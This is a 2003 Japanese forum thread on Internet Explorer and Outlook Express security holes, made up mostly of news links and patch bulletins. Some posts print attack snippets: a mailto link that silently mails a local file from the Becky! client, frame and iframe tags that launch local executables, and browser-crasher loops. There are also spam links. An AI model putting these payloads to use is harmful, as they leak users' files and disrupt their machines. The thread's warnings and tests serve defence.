OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法

Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。

http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16


65 名前：名無しさん＠お腹いっぱい。 投稿日：03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です！！

mailto:[email protected]?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo

こんなリンクが張られたら一巻の終わりじゃないですか？
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう！！


67 名前：65 投稿日：03/05/03 17:29 ID:nWmKJb8r
補足。

>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。

だから最新パッチあててるOEの方が安全だってば。

2.05.11ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

http://www.rimarts.co.jp/becky-j.htm

>>440
ウィルスバスターがダメなんだと

>>448
ソースは？

IEとスクリプトの“危険な関係”（上）
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”（中）
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”（下）
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/

http://homepage.mac.com/hitomi18/

Opera for Windowsに新しいセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101

Internet Explorerがfile:// リクエストの際にゾーンを無視する
http://www.symantec.com/region/jp/sarcj/security/content/7539.html

>>453
うわっ　またなんかすごいの来たー

MSサポートを装うウイルスに注意
http://www.zdnet.co.jp/news/0305/19/njbt_03.html

IEに危険なセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/

米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html

>>455
>IEに危険なセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる！
H系DLに紛れ込んで何でもやり放題？

Hotfix出てないんかい

>>453
>>455
やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。

Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。

＞IEに危険なセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。

ここサンプルページ(要注意)
http://www.malware.com/forceframe.html

２７才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがＹＵＩＳ！！
安いし、安心して買えるしなかなかいいですよ！いつもバイブ物買ってます！

http://www.dvd-yuis.com/

ファイルのダウソ禁止してダウソはツール使うしかなさげだな。

Opera使いの俺はだいじょうび

報告。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん！」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。

プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。

下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。

>>459
やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな？

>>465
（・３・）　エェー　スラッシュ.に同じような報告あったYO

>>459 のデモ
｢現在のセキュリティではDLできません｣のダイアログ永遠に開きまくり
IE落としたら｢ダウンロードを中止していいですか？｣だってｗ
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ

Irvineのクリックキャッチを有効にしとくと
1個ずつしかダイアログが出なくなるから大丈夫げ

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

>>453 >>459 のFixまだ無いの？

またもやパッチに不具合，すべてのパッチをアンインストール可能に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/

ここのところパフォーマンスダウンの問題で、いまだFIXされない奴
溜まってるのに。。

◎ちょっと見て見て！！◎
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

そろそろ新OS出すために
バグをちらほらと小出しにしてる感じだな

age

最善の対策：ＭＳＯＥ使うな。

--------------------------終了----------------------------

>>477
では、お勧めのメーラは？

>>478
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。

厨な質問なんですが、ﾄﾞｰﾅﾂPしか使ってないんだけどIEのﾊﾟｯﾁ当ててないと
まずいんですか？

>>480
DonutPはIEコンポーネントブラウザです

>>481
まずいってことですね？
ｲﾏｲﾁその言葉の意味がよくわからんで、、、

ﾊﾟｯﾁ当てて出直してきます。

>>440関連
Windows XPでパフォーマンスに悪影響を与えるパッチの改訂版が登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030602/1/

MS03-019　今回の更新内容
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp

Windows NT/2000のセキュリティ・ホールの深刻度が，より深刻な「重要」に変更
　リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/

HTMLメールはやめよう
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030530/2/

OEは常にウイルスのターゲットになるからやめとけ

>>478
Edmaxフリー版とか

>>479
どうやってメモ帳をメーラーとして使うんだよ

>>485
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。

完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可

>>485
HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。

>>486
＞どうやってメモ帳をメーラーとして使うんだよ

電信8号

EdMAXはメッセージを来たままの状態で保存しないから、糞。

Microsoft，「IE 6 SP1が独立した最後のWebブラウザ」と語る
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm

先生方よろしくお願いします。
ﾒｰﾙｿﾌﾄは outlook expressを使用していますが
受信ﾒｰﾙ、送信ﾒｰﾙが全て無くなっています。
何日か前にﾌﾞﾗｸﾗ踏んでしまい、その後受信ﾒｰﾙだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信ﾒｰﾙ＋送信ﾒｰﾙが無くなって
いました。
原因は先日踏んだﾌﾞﾗｸﾗなのでしょうか？
そしてほっておくとまたこのような事がおきるのでしょうか？
良きｱﾄﾞﾊﾞｲｽお願いします。

http://homepage.mac.com/hiroyuki43/jaz09.html

>>492
諦めて、ＯＥを再インスコすれ
その際にウィルススキャンするのも忘れずに

>>492
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。

ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?

>>494、>>495さん
ありがとうございました

MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

●修正プログラム
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe

・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe

注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。

・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe

(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。

>>497-498
IEに2種類の危険なセキュリティ・ホール，任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
（1）Objectタグの処理に関するセキュリティ・ホール
（2）ファイルのダウンロード・ダイアログに関するセキュリティ・ホール

新たに2つ「緊急」の脆弱性、MSがIE用の累積パッチを公開
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ（MS03-020）を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html

>>498 って >>455の
"IEに危険なセキュリティ・ホール，スクリプトを無効にしても攻撃を受ける"

のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね？

>>453 のゾーン無視の方はどうなってるのだろ。。。

私も便乗でお尋ねしたいのですが、
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
（「マイコンピュータ」を含む）で無効にしててもダメですかね？

>>501, >>501
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。

>>503
さんきゅです

>>502
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない？

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ

>>505
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。

あ！ マイコンピューターもちゃんと視野に入ってるのね >>502

>>507
そうでぃ〜す！　いずれにしても、レスありがとうございます。

まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。

>>508
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。

<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>

>>509
さっそくやってみました。たしかに出ました、ダイアログが！
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。

「ファイル交換ソフトで感染を広げるウイルスの届け出数が急増中」――IPA
ブラウザ・クラッシャによる被害も増加中，設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/

コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html

メール機能を悪用する主なウイルス一覧
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日：2003年 6月 5日

age

age

みてね〜♪
http://www1.free-city.net/home/s-rf9/page002.html

>>485
【結果発表】HTMLメールをどう思いますか？
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030609/1/

【川崎憲次郎投手をオールスターに！】

ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにＦＡ権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号２０は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら２軍で、練習すらできない日々。
２年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
３年契約の３年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは？
そう彼に相応しい復活の舞台はオールスターだ！
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html



　　　　　　

セキュリティ・ホールを修正した「Opera7.11 for Windows 日本語版」が公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/

>>518
スレ違いだろ。

MS03-020って烈しく無意味なのですが・・
http://www.malware.com/forceframe.html

>>520
Operaもだめみたい
mozillaは大丈夫

>>520氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。

ヽ(`Д´)ﾉ ｳﾜｧｧｧｧｰｰｰｰｰｰﾝ!!!

>>520
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。

大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。

ウインドーズ９８は、もう更新できないのでしょうか？
更新しようとしても、９８についの説明がありません。

それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか？
壊れ始めているよ〜だ！　SOS,　SOS,　,　,

>>525
Win98は今月末までのサポート。
Windows板http://pc2.2ch.net/win/

マウスの件はマウスを買い換えろ。壊れてるだけ。
念のためウィルススキャンしろ。

おっ、Piggybackで止まった

http://homepage.mac.com/hiroyuki44/

>>522
>>459で既出のサンプルページだろ。
>>520も一言説明して貼るべきとは思うが・・・。

直リンもやめるべきだろう。
>>520のメール欄を見る限りは確信犯。

age

IEの新しい累積パッチにはいくつかの注意点，既に適用したユーザーも再確認を
　既知のホールを解消できるものの不完全，ブラウザ・クラッシャは回避できない
　今週のSecurity Check [Windows編] （第97回，2003年6月18日）
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/

Microsoft的にはブラクラは優先的に対処すべきセキュリティホール
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある

あげ

☆頑張ってまーす！！☆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

>>533
OSごと落ちる9x系
MS的には「昔そんなのありましたっけ？さっさとXP買ってね」

まあ優先は他の穴だとは思うけどさ

>>526
どうもありがとう。行って来ました。

Win2k/XPなら制限付きユーザーでブラウズすると、
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。

age

あげ

　　_, ._
　 （　ﾟ Дﾟ）
　　( つ　O 　　ｶﾞｼｬ
　　と＿)_)　　__
　　　　　　　（__(）､;.o：。
　　　　　　　　　ﾟ*･:.｡

age

IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP

IEブラウザに新たな欠陥：米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm

IE5.5SP2のダウンロードは終了したはずだが、
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja

>>545
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない

>>545
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが

http://www.zdnet.co.jp/news/0306/27/nebt_18.html
判決出た。搭載命令は撤回

米Sunと米MSのJava訴訟，Java搭載の仮命令は差し戻し
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/

>>545
ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか？

>>550
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…

>>551
駅に置いてあるやつでいいの？

ＷＩＮ９８だが、もうすぐアップデートできなくなるらしい。
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い？
ダウンロードしてなにか問題がなかったでしょうか？　あったような？

>>553
（ ﾟдﾟ）ﾎﾟｶｰﾝ

私のところにメールが頻繁に届きます。
本当に簡単な仕事ですか？と聞かれますので
答えました。簡単なビジネスです。１日の労働時間は
２時間です。皆さんは０円から行い、
最終的に年商３０００万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm

>>553
Windows98 はあと３、４年ぐらい不滅です！Part2
http://pc2.2ch.net/test/read.cgi/win/1055040506/l50

EdMax, WeMail32など複数のWindowsメーラにセキュリティホール
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html

OEを糞といってた諸君、一言どうぞ。

Outlook Express6SP1を使っています。
ツール＜オプション＜メンテナンス＜最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。

環境はxpsp1　
関係ありそうなアプリはVB2003、ZoneAlarm（フリー版3.7.193）でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。

---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------

追加です。
アプリとしては上記のほか、
SpywareBlaster（スパイウエアブラスター）でオールチェック
Spybot（スパイボット）で免疫化適用
AdAware（アドアウエア）で定期チェック　です。
よろしくお願いします。

>>558
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。

↑
（；´Д｀）

>>559
最適化中に送受信が入るとそのメッセージが出る。

>>561
OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。

>>563
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。

>>556

おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、（反省）。
亀レスになってしまいました（汗）。

>>557対応状況
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html

問題点は、OEは対策されるまで公表されない場合が多い。
他のメーラはOEで公表後、後追いでの対策になる。

> OEは対策されるまで公表されない場合が多い。
あたりまえだろ、対策前に公表されたらアタックされるぞ

まぁ、公表されても見ないあほが多いけどな。

[Full-Disclosure] Internet Explorer 6 DoS Bug
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030708_aux

>>571
Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。

(；´Д｀)感動した
http://homepage3.nifty.com/coco-nut/

>>571-572
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html

Windowsに3種類の深刻なセキュリティ・ホール，すべてのユーザーが対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

（1）HTML コンバータのバッファ オーバーランにより，コードが実行される（823559）（MS03-023）
（2）Windows のバッファ オーバーランによりデータが破損する（817606）（MS03-024）
（3）ユーティリティ マネージャによる Windows メッセージ処理の問題により，権限が昇格する（822679）（MS03-025）

http://homepage.mac.com/hiroyuki44/

みてね！　
http://akipon.free-city.net/page003.html

>>575
不具合報告あり。
windows updateしたときに上げるスレ 6
http://pc2.2ch.net/test/read.cgi/win/1057833448/l50

WebブラウザOperaにサービス拒否攻撃を受ける新しい弱点
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/

>>579
関係ないだろ、スレのタイトル読めない？

>580
脳みそがクラックされてるから仕方ない

HTML コンバータのバッファ オーバーランにより、コードが実行される
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。

>>579-581
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。

>>582はたぶんalign buffer overflowの修正だ。
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし

>>583
だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

保守

>>585
IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ>>1でもあったんじゃない？
IE/OEの話題がメインだとしても。

1 July 2003: There are currently 19 unpatched vulnerabilities.
http://www.pivx.com/larholm/unpatched/

↑Unpatched IE security holes

>>588
IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。

いつのまに"IE/OE使う人のためのスレ"になったんだ…

>>592
Operaの話題はOperaのスレでやれってことでしょ？
それとスレは君の私有物ではないよ

セキュリティパッチ情報集積所でも立てるか

漏れも全部一緒のほうがありがたい

http://www.microsoft.com/japan/technet/security/fixedhome.asp
しかし、わかりにくいところにあるなｗ

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される(819696)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030ov.asp

期間限定！もうお目にかかれない！

http://alink3.uic.to/user/angeler.html

http://altba.com/bakera/hatomaru.aspx/ebi/genre/00490045
＞XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
＞セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

これってもう対策されたんだっけ？

６００げっっとーーーーーおぉ！！

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

hage

>>599
とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え

いろいろ読ませてもらったけど、つまるところ
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。

>>604
違う。セキュリティホールを考慮してない。

すべてテキスト形式で受信するなら
IEコンポーネントいらないじゃん

OEの開発、提供停止
http://www.zdnet.com.au/newstech/ebusiness/story/0,2000048590,20277192,00.htm

>>607
メーラー作者は(ﾟдﾟ)ｳﾏｰか

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

（・３・）　エェー

IEに「緊急」の脆弱性、累積パッチリリース

http://www.zdnet.co.jp/enterprise/0308/21/epn02.html

Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp

○「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp

○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。

○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp

○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp

IEのパッチに問題発覚，適用しても解消で きないセキュリティ・ホールが存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/

Windowsにまたもや“超特大”のセキュリ ティ・ホール，すぐにWindows Updateの実施を
第2，第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/

致命的な奴が8つも追加…
http://www.pivx.com/larholm/unpatched/

2年前の脆弱性を突いた新ウイルスが拡散
http://www.zdnet.co.jp/enterprise/0309/19/epn03.html

W32.Swen.A@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
WORM_SWEN.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SWEN.A&VSect=T
W32/Swen@MM
http://www.nai.com/japan/security/virS.asp?v=W32/Swen@MM

MS03-040: Internet Explorer 用の累積的な修正プログラム (828750)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp

マイクロソフト、IE 5.01以後が対象の緊急の脆弱性「MS03-040」
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html

米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm

IEに危険なセキュリティ・ホール，
WebページやHTMLメールを見るだけで被害を受ける

今回の累積パッチでは，過去のパッチでふさげなかった
セキュリティ・ホールも修正

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/

後を絶たないIEのセキュリティ・ホール，設定変更などで“自衛”を
続々見つかるパッチの不具合，パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/

「ネットにつなぐだけで攻撃を受ける」――第三の“超特大”セキュリティ・ホールを解説する
Exploitが既に公開，パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/

IE/OEと関係ないのでsage

IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、
お気に入りに３つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。

どのたか改善方法を教えてください。

http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/

>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限１から書かれているＦＡＱとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね

Internet Explorer 用の累積的な修正プログラム (828750) (MS03-040)

最大深刻度 :緊急

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp

↑ミス
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。

サーバ関連情報レジストリがばれている限り貴方のPCに侵入した自己散布型ウイルスは自分を撒き散らします。
かといってOEの類を使うのを止めるのはしゃくですよね？
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。

IEに「緊急」のセキュリティ・ホール，マイクロソフトは累積パッチを公開
